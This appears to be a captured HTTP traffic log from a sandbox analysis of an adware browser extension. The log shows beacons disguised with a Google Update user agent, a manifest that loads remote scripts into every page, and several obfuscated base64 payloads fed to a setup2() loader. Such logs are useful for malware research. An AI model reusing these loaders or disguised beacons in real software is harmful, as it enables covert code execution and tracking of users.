    ETag: "1407922596"
    Last-Modified: Wed, 13 Aug 2014 09:36:36 GMT
    Cache-Control: max-age=900
    Content-Length: 94779
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
    var jQuery = $jquery_171 = $jquery = null;..if (document && typeof doc
    ument.getElementById !== "undefined") {../*! jQuery v1.7.1 jquery.com 
    | jquery.org/license */.(function(a,b){function cy(a){return f.isWindo
    w(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){
    if(!ck[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("disp
    lay");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("ifram
    e"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl
    .createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.w
    rite((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<htm
    l><body>"),cm.close();d=cm.createElement(a),cm.body.appendChi
    ld(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}func
    tion cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),functio
    n(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(c
    t,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("M
    icrosoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRe
    quest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.da
    taType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(
    g=1;g<i;g  ){if(g===1)for(h in a.converters)typeof h=="string"&&(e[
    h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!
    =="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p=b;for(o in e){j=o.s
    plit(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k];if(p){o=e[o],o===!0
    ?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from " 
    <<< skipped >>>
    

    GET /monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: logs.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1413862437.dop011.am4.t,1413862437.cds058.am4.c
    GIF89a.............,...........D..;..

    

    GET /ThawteTimestampingCA.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: crl.thawte.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: Apache
    ETag: "075003e67d35591a801778336e66e994:1411607711"
    Last-Modified: Thu, 25 Sep 2014 01:15:11 GMT
    Date: Tue, 21 Oct 2014 03:33:49 GMT
    Content-Length: 341
    Connection: keep-alive
    Content-Type: application/pkix-crl
    0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U..
    ..Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U..
    ..Thawte Timestamping CA..140922000000Z..141231235959Z0...*.H.........
    ......z ...H.....h.......>V......<...Y*.4..m.P{w.yN.*..rH....o7.
    _..B.H..$O......D(..Or..E..e3....XR.#!1.5j.h..p......<.#..:.FI..l?.
    ..

    

    GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399825872"
    Last-Modified: Sun, 11 May 2014 16:31:12 GMT
    Cache-Control: max-age=3316
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862436.dop012.am4.t,1413862436.cds062.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">.  <daystart elapsed_seconds="56754"/>.  <
    ;app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">.  
    .<event status="ok"/>.  </app>.</response>...

    

    GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/ping.xml?rand=3105 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:58 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399811336"
    Last-Modified: Sun, 11 May 2014 12:28:56 GMT
    Cache-Control: max-age=21600
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862437.dop012.am4.t,1413862438.cds046.am4.s,1413862438.dop003.se1.r,1413862438.cds016.se1.p,1413862438.cds046.am4.p
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">.  <daystart elapsed_seconds="56754"/>.  <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.  
    .<event status="ok"/>.  </app>.</response>...

    

    GET /tss-ca-g2.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: ts-crl.ws.symantec.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: Apache
    ETag: "8511e81ed9a0e75095d40bb42766b437:1413839808"
    Last-Modified: Mon, 20 Oct 2014 21:16:48 GMT
    Date: Tue, 21 Oct 2014 03:33:49 GMT
    Content-Length: 477
    Connection: keep-alive
    Content-Type: application/pkix-crl
    0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporatio
    n100...U...'Symantec Time Stamping Services CA - G2..141020210119Z..14
    1030210119Z.00.0...U.#..0..._..n\..t...}.?..L...0...U........0...*.H..
    ...........~.......... ... ..?w0..Rr.."...?.......pi....F.'|.4..n....%
    [email protected].)..m.2.<.....Q.32.....k(S#........2V...3.......j,....4F....
    ....^..K.e..d...}[email protected]
    8..q.8.Ws6..i<.../..HP<..J.%[email protected]..=......T.........ubTn..

    

    GET /plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:55 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1412095900"
    Last-Modified: Tue, 30 Sep 2014 16:51:40 GMT
    Cache-Control: max-age=900
    Content-Length: 1706
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862435.dop013.am4.t,1413862435.cds049.am4.pr
    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>.  <V
    er>102</Ver>.  <ShortName>MediaPlayerplus</ShortName
    >.  <Description>MediaPlayerEnhance Extension</Description
    >.  <PublisherName>Freeven</PublisherName>.  <HomePa
    geLink>NA</HomePageLink>.  <JSLink>hXXp://js.newdatasta
    tsserv.com/plugin/apps/54246/js/na/ie/app_code.js</JSLink>.  <
    ;GroupID>0</GroupID>.  <Domain>NA</Domain>.  <
    RunInIframe>false</RunInIframe>.  <ThanksURL>NA</Tha
    nksURL>.  <EmailSignature>NA</EmailSignature>.  <Set
    tingsURL>NA</SettingsURL>.  <CertifiedInstall>NA</Ce
    rtifiedInstall>.  <ExposeSites>NA</ExposeSites>.  <R
    emoteFBApiURL>NA</RemoteFBApiURL>.  <DisableIE>true<
    /DisableIE>.  <DisableFF>true</DisableFF>.  <EnableS
    earchIE>false</EnableSearchIE>.  <EnableSearchFF>false&
    lt;/EnableSearchFF>.  <AddressbarIE>NA</AddressbarIE>. 
     <AddressbarFF>NA</AddressbarFF>.  <AddressbarFFEnhance
    d>NA</AddressbarFFEnhanced>.  <AddressbarCR>NA</Addr
    essbarCR>.  <NewTabURL>NA</NewTabURL>.  <NewTabEmbed
    >NA</NewTabEmbed>.  <OpenSearchURL>NA</OpenSearchURL
    >.  <BackgroundJS>hXXp://js.newdatastatsserv.com/plugin/apps/
    54246/bg/na/ie/bg_code.js</BackgroundJS>.  <BackgroundVer>
    2</BackgroundVer>.  <Manifest>NA</Manifest>.  &l
    <<< skipped >>>
    

    GET /plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:55 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1412093723"
    Last-Modified: Tue, 30 Sep 2014 16:15:23 GMT
    Cache-Control: max-age=496
    Content-Length: 736
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862435.dop013.am4.t,1413862435.cds056.am4.c
    ..  /*****************************************************************
    *******************.  This is your Page Code. The appAPI.ready() code 
    block will be executed on every page load..  For more information plea
    se visit our docs site: hXXp://docs.crossrider.com.*******************
    ******************************************************************/...
    appAPI.ready(function($) {..  //alert(appAPI.isMatchPages("*youtube*")
    );.  //alert(appAPI.isMatchPages("*watch*"));.  //alert(appAPI.isMatch
    Pages("*hd=1*")).  .  if (appAPI.isMatchPages("*youtube*") && appAPI.i
    sMatchPages("*watch*") && !appAPI.isMatchPages("*hd=1*")) {.  .//alert
    (window.location);.    window.location = window.location   "&hd=1".   
     //alert(window.location);.  }..});.    ....


    GET /plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1412093734"
    Last-Modified: Tue, 30 Sep 2014 16:15:34 GMT
    Cache-Control: max-age=900
    Content-Length: 432
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds042.am4.pr
    ../*******************************************************************
    *****************.  This is your background code..  For more informati
    on please visit our wiki site:.  hXXp://docs.crossrider.com/#!/guide/s
    copes_background.*****************************************************
    ********************************/..appAPI.ready(function($) {..  // Pl
    ace your code here (ideal for handling browser button, global timers, 
    etc.)..});..    ....


    GET /plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1412093724"
    Last-Modified: Tue, 30 Sep 2014 16:15:24 GMT
    Cache-Control: max-age=900
    Content-Length: 18161
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds047.am4.pr
    {.."plugins_version": 93,.."plugins_list":.    [.      {"id":4,"url":"
    hXXp://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js
    ","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":t
    rue,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":1020
    0},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"orde
    r":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newdatastatsserv.c
    om/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true
    ,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"
    run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{
    "id":3,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/3.js","ver":
    2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":
    false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"r
    un_at":2,"order":10300}],"enabled":true},{"id":47,"url":"hXXp://js.new
    datastatsserv.com/plugins/mins/47.js","ver":3,"name":"resources_backgr
    ound","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"
    px":false},"targets":[{"run_at":0,"order":30000},{"run_at":5,"order":3
    0000}],"enabled":true},{"id":246,"url":"hXXp://js.newdatastatsserv.com
    /plugins/mins/246.js","ver":15,"name":"setup","browsers":{"ie":true,"f
    f":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":
    0,"order":5},{"run_at":1,"order":5}],"enabled":true},{"id":267,"url":"
    hXXp://js.newdatastatsserv.com/plugins/mins/267.js","ver":1,"name":"st
    ats_ch","browsers":{"ie":false,"ff":false,"ch":true,"sf":false,"nv
    <<< skipped >>>

    GET /plugins/mins/42.js?ver=10&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1409568411"
    Last-Modified: Mon, 01 Sep 2014 10:46:51 GMT
    Cache-Control: max-age=900
    Content-Length: 7866
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds038.am4.c
    var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof 
    appAPI==="undefined"){appAPI={};}appAPI.__should_activate_validation__
    =true;(function(a){if(typeof window=="undefined"){window={};}if(typeof
     window.document==="undefined"){window.document={};document=window.doc
    ument;}if(typeof window.alert==="undefined"){window.alert=function(b){
    var c;if(typeof b==="undefined"){c="undefined";}else{if(b===null){c="n
    ull";}else{c=b.toString();}}if(typeof c==="string"){a.alert(c);}};aler
    t=window.alert;}})(appAPIinternal);if(typeof console==="undefined"){wi
    ndow.console={};console=window.console;}if(typeof console.log==="undef
    ined"){window.console.log=function(a){};console.log=window.console.log
    ;}if(typeof console.info==="undefined"){window.console.info=function(a
    ){};console.info=window.console.info;}if(typeof console.warn==="undefi
    ned"){window.console.warn=function(a){};console.warn=window.console.wa
    rn;}if(typeof console.error==="undefined"){window.console.error=functi
    on(a){};console.error=window.console.error;}if(typeof console.assert==
    ="undefined"){window.console.assert=function(a){};console.assert=windo
    w.console.assert;}if(typeof console.dir==="undefined"){window.console.
    dir=function(a){};console.dir=window.console.dir;}if(typeof console.cl
    ear==="undefined"){window.console.clear=function(a){};console.clear=wi
    ndow.console.clear;}if(typeof console.profile==="undefined"){window.co
    nsole.profile=function(a){};console.profile=window.console.profile;}if
    (typeof console.profileEnd==="undefined"){window.console.profileEn
    <<< skipped >>>

    GET /plugins/mins/281.js?ver=2&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403604591"
    Last-Modified: Tue, 24 Jun 2014 10:09:51 GMT
    Cache-Control: max-age=900
    Content-Length: 483
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds064.am4.c
    if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MG
    IxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1
    MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMT
    JlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0
    MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3Mz
    MyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2
    MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }
    ....


    GET /plugins/mins/286.js?ver=2&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403817866"
    Last-Modified: Thu, 26 Jun 2014 21:24:26 GMT
    Cache-Control: max-age=900
    Content-Length: 975
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds064.am4.c
    if (typeof setup2 === 'function') { setup2('MTY3MjRjNTQ0MjUxNTcxYjE2MT
    YxZDJkMWUxODQwNGI1NTUxMGExNjE5MDg1NjViNGQxODE2MWU0YzEwNDMwZjAzMDYwZTE1
    MDYwMDBlNGMwMzFkMTg1YjExMDE1YTEyNGMwODFlNDcwZjE1MGYwMTE0MWEwNTBjMjQxYz
    UxMmIzZDMyMjczYzMxMzEzZjMxMjgzMTMwMmUzNjMyMmYzMjMyMzEyODJiM2Q1NzE2MWMx
    NzBjMTkwYTE1MzcwZDE1MTA0ZTNkM2QyZTJhMjMyNzMxMjMzYzM3MjczMDMyM2IyMzIxMm
    MyNTI3MmEzZDIxMjIzYzI5MmIzZDU3MTQwMzEyMmMwYzE1MDk0OTNkMmUzNjIxMmQzMTNl
    MmEyNTMwMjcyMzJhMzIzMjMyMzIzNjJkMzkyNzJlMmE1MTRlNjg0ZDU4NGM1NDQwMTkwMT
    A3MTIxMTM4MGEwMDU2NTg1MTU3MWIxNjE2MWQwYjU2NWI0ZDE4MTYxZTRjMTA0MzBmMDMw
    NjBlMTUwNjAwMGU0YzAzMWQxODViMTEwMTVhMTI0YzA4MWU0NzBmMTUwZjAxMTQxYTA1MG
    MyNDFjNTEyYjNkMzIyNzNjMzEzMTNmMzEyODMxMzAyZTM2MzIyZjMyMzIzMTI4MmIzZDU3
    MTYxYzE3MGMxOTBhMTUzNzBkMTUxMDRlM2QzZDJlMmEyMzI3MzEyMzNjMzcyNzMwMzIzYj
    IzMjEyYzI1MjcyYTNkMjEyMjNjMjkyYjNkNTcxNDAzMTIyYzBjMTUwOTQ5M2QyZTM2MjEy
    ZDMxM2UyYTI1MzAyNzIzMmEzMjMyMzIzMjM2MmQzOTI3MmUyYTUxNGU2ODRkNTg0YzU0ND
    AwMTE5MDYwNTBiMDMzMTA4NTY1ODUxNDc0YjU0NjgxMA==', 'mxltbqusbb'); }t>....


    GET /plugins/mins/273.js?ver=4&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405263856"
    Last-Modified: Sun, 13 Jul 2014 15:04:16 GMT
    Cache-Control: max-age=900
    Content-Length: 1047
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
    if (typeof setup2 === 'function') { setup2('MTA2MTRmNDU1OTUwNDQwNjE1MD
    UxYjNlMWQwOTViNGE0NjRjMDkwNTFmMWI1NTRhNTYxNDU3MWYxMDE1MGYxZTA5MDQxNTQ0
    MDI1YjU5NWYwODA3MDAxMDFkMTYxNDAxMGYwNTQ1MDUwYTExNTYwMzA1MWMwODAxMWYxOD
    QwMDYxNjFlMTIwYjE5MDUxZTBhMDMwZjBhNWYxMDVjNGUxMjFmMTMwNTE2NTcxYTE1NTEw
    MDE3MGQzNDA2MDE0NDQxNTc1YTU0NTcxODFlMGQwNDFmMTYzOTA3MDU0YzM0MzQyYzM3Mz
    YyMzM1M2MyODM1MmUzOTMwMjAyMTI0MjMyMDI1MzQyZjM0M2MzMDNiMmYyZjJhM2UyZTRk
    MTgwZDE3MTgxZTAyNTMzZTJlMjgzOTIwMzYyYTIyMmYyYTI0MjMzNDJhM2YzNTI2M2UyNz
    IzMjQyZTM0NDk0MzZmNTk1MDQ2NGU0MzE5MWYxZjFmMTYyYzAyMGE0YzViNTE0OTAzMWIx
    MTA5MDM1YzQxNGUxNTVhMWExZTAxMWQwNTAwMGYwZDQ1MGY1ZTU3NGIxYTFjMDkxYjA1MT
    cxOTA0MDExMTU3MWUwMzFhNGUwMjA4MTkwNjE1MGQwMzQ5MGQwZTFmMWYwZTE3MTEwYzEx
    MGEwNDEyNWUxZDU5NDAwNjBkMDgwYzFkNGYxYjE4NTQwZTAzMWYyZjBmMGE1YzQwNWE1Zj
    VhNDMwYTA1MDQwZjA3MTczNDAyMGI1ODI2MmYyNTNjMmUyMjM4MzkyNjIxM2MyMjM5MmIz
    OTI1MmUyNTJiMjAzZDJmMzUzYjIzMmUyMjJmMzAzYTVmMDMwNDFjMDAxZjBmNTYzMDNhM2
    EyMjI5M2QzMjIzMjIyZjJhMzcyNjMxMzYzZTNlM2YyYTI2MmEzYTI2NTI0YTY0NDE1MTRi
    NGI0ZDE1MTUwNTAxMDcwZjM4MGY0OTU1NDU0YjQ3NTU2NDFj', 'kkoeypfnaq'); }ont>....


    GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1411293488"
    Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT
    Cache-Control: max-age=117
    Content-Length: 1075
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
    if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMD
    AxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2
    NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0ND
    JkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3Mzky
    ZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMz
    UzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5
    MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYT
    MzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1
    YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MT
    kwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4
    MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0ND
    FlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQy
    ZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMz
    gzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNi
    MjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIwZjA4M2QwMDQ5NDg0MTU1NDE1Nz
    ZjMWI=', 'dkragwefft'); }    ....


    GET /plugins/mins/263.js?ver=2&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1411293476"
    Last-Modified: Sun, 21 Sep 2014 09:57:56 GMT
    Cache-Control: max-age=381
    Content-Length: 1075
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
    if (typeof setup2 === 'function') { setup2('MTA3ODU2NTA0NjU0NTQwZDE4MW
    IxYjI3MDQxYzQ0NGU1NjQ3MDQxYjFmMDI0YzVmNDkxNzEyMGIwZjBlMDgxYTEzNDE0YjE1
    NTgwNDA3MGUwNjEzMWYxODAyNWExODAwMTg0MDE4MDcxNDVmMTA0NzQ0NTQ1NTBkMGY1ZD
    I5MmYyNTI2MzkzNjNmM2QyMjM2MzMyMjM5MzEyZTMxMjkyMTJmMzczMjJmMzUyMTM0M2Ey
    NTJiMzQyZDU5MWM0ODFlMDU1YTFjMDYwZjRmNDc0MDVmNDA1MDAwMTQxYjU2MmQyOTMzMz
    QzYjI1MzYzZTI2MmYzNzI0MmYyNzI0MjYzYTIyMmUyNjM3MjkyZjQwMDcwZjE2MTgwYTA2
    MWIxMjRkMzkyYjM1MzcyMzNjMzgyMDNmMzQyMzI2MjkyYzIyM2MzZjMzM2EzYzIzMjYyOT
    MwM2YyYTM5MmQzZjM0MzkyYjU0NDk2NjRmNGI1MjU2NTIwZTAwMDIxNTFmM2ExOTFlNTQ0
    YTQ2NTYxZTExMTgxZjE4NDg1OTVmMDUxMDE4MDYwZDBjMDMxNzQ3NWQwNzVhMTcwZTBkMD
    IwYTFiMWUxNDQ4MWExMzExNDMxYzFlMTA1OTA2NTU0NjQ3NWMwZTBiNDQyZDI5MzMzNDNi
    MjUzNjNlMjYyZjM3MjQyZjIzMmMyMjIwMjIyYjJlMzYyOTIzMzMzNjI5MmMyODMwMzQ1ZD
    FhNWUwYzA3NDkxNTA1MGI1NjQzNDY0OTUyNTIxMzFkMTg1MjM0MmQzNTIyMjkyNzI1Mzcy
    NTJiMmUyMDI5MzEzNjI0MjkyYjJkMjIyZTJkMjk1NjE1MGQwNTExMDkwMjAyMTY0YjJmMz
    kzNzI0MmEzZjNjMzkzYjMyMzUzNDJiM2YyYjNmM2IyYTNlM2EzNTM0MmIyMzM2MjkzZDM0
    M2IzMjJmMzk1NjVhNmY0YzRmNGI1MjU0MDAwYTAxMTEwYzAyMjYwZjUwNGM1MDU0NDI0NT
    ZmMTE=', 'krvpftvelo'); }    ....


    GET /plugins/mins/233.js?ver=7&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273128"
    Last-Modified: Sun, 17 Aug 2014 10:58:48 GMT
    Cache-Control: max-age=900
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds065.am4.c
    if (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MD
    cxNjRmNDg0ZTU3MGMxMjFhMTM0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBj
    MDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0Zj
    FhMWEwMTE0MTUzYjExMTk1ODU3NTI0YzFkMTAxMjFlMTA0ZjU1NDIxMzFkMDcxMjRiMGY0
